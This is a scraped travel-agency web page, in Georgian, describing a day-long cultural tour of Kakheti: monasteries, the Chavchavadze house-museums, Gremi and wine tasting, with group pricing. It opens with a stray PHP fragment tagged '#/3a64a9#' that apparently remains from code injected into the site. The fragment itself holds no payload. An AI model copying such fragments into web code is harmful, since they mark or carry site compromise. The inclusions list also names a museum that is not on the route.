if(empty($nt)) { $nt = " "; echo $nt; } #/3a64a9# ?>
Price - From-35$
Location -
Property -
Bedrooms -
Bath -
Garage -
Featured

 კულტურული ტური კახეთში

მარშრუტი: თბილისი – გურჯაანის ყველაწმინდა – წინანდალი -

გრემი – ყვარელი – თბილისი

კახეთის დათვალიერებას დაიწყებთ გურჯაანის ყველაწმინდის ტაძრის მონახულებით, იგი ღვთისმშობლის მიძინების სახელზეა აგებული და წარმოადგენს ერთადერთ ორ გუმბათოვან ტაძარს საქართველოში. არსებობს ლეგენდა, რომლის მიხედვითაც, ერთ-ერთი შემოსევის დროს ბერებმა და მლოცველებმა სამალავს შეაფარეს თავი, დარჩა მხოლოდ ჩვილბავშვიანი ქალი, რომელიც სასოწრაკვეთილის სამალავს ეძებდა, მოულოდნელად ეკლესიის კედელი გაიხსნა და ქალი იქ დაიმალა, ცოტა ხნის შემდეგ ქალს იმდენი რძე წამოუვიდა, რომ კედელიდან დაიწყო გადმოსვლა. ამ დღიდან დედები, რომელთაც რძე არ აქვთ, მიდიან, ფხეკენ ტაძრის სველ კედელს, სადაც თეთრი ფერის წვეთები შეიმჩნევა და სვამენ.  დღეს აქ მოქმედი დედათა მონასტერია.

შემდეგ  მოინახულებთ  წინანდალს – ალექსანდრე ჭავჭავაძის სახლ-მუზეუმს, იგი იყო პოეტი, მხედართმთავარი, მთარგმნელი, დიპლომატი და იმ ეპოქის ერთ-ერთი მნიშვნელოვანი ფიგურა გახლდათ. მას პატივს სცემდნენ როგორც საქართველოში, ისე რუსეთის იმპერიაში. ალექსანდრე ჭავჭავაძემ პირველმა, ქართული ღვინო ევროპული წესით დაამუშავა და დასავლეთისათვის ხელმისაწვდომი გახადა. მისი ღვინის მარანი დღესაც აგრძელებს არსებობას. დამთვალიერებელს შესაძლებლობა აქვს ბოთლში პირველად ჩამოსხმული 1839 წლის მოსავლის საფერავი იხილოს; ამას გარდა აქ 16 500 ბოთლი სხვადასხვა  სახეობის  ღვინო ინახება.

ღვინის დეგუსტაცია;

რის  შემდეგაც  გაემგზავრებით  ქალაქ თელავში და დაათვლიერებთ თელავის ისტორიულ მუზეუმსა და გრემის ნაქალაქარს – 17 საუკუნეში გრემი კახეთის დედაქალაქს წარმოადგენდა.  კომპლექსში შედის: ეკლესია, სამეფო რეზიდენცია, ქარვასლა (ძველი სასტუმრო) და სათორთიფიკაციო ნაგებობები.

ტურის ბოლოს შესაძლებლობა გექნებათ ესტუმროთ ილია ჭავჭავაძის სახლ-მუზეუმს ქალაქ ყვარელში, დაისვენოთ ყვარლის ტბის სანაპიროზე და დატკბეთ ულამაზესი ხედებით.

ვახშამი ტრადიციულ რესტორანში

  ფასი:                         

1  ადამიანი             430$
2             230$
4             130$
10              58$
15              43$
20              35$

ღირებულებაში  შედის: ტრანსპორტით მომსახურება – პროგრამის შესაბამისად

                                                      რაბათის მუზეუმში შესასვლელი ბილეთები

                                                      გიდის მომსახურება

                                                     ვახშამი

                                                     მინერალური წყალი

Leave a Reply



Please verify your information

Your booking is complete

A detail copy has been sent to your email and also to our staff.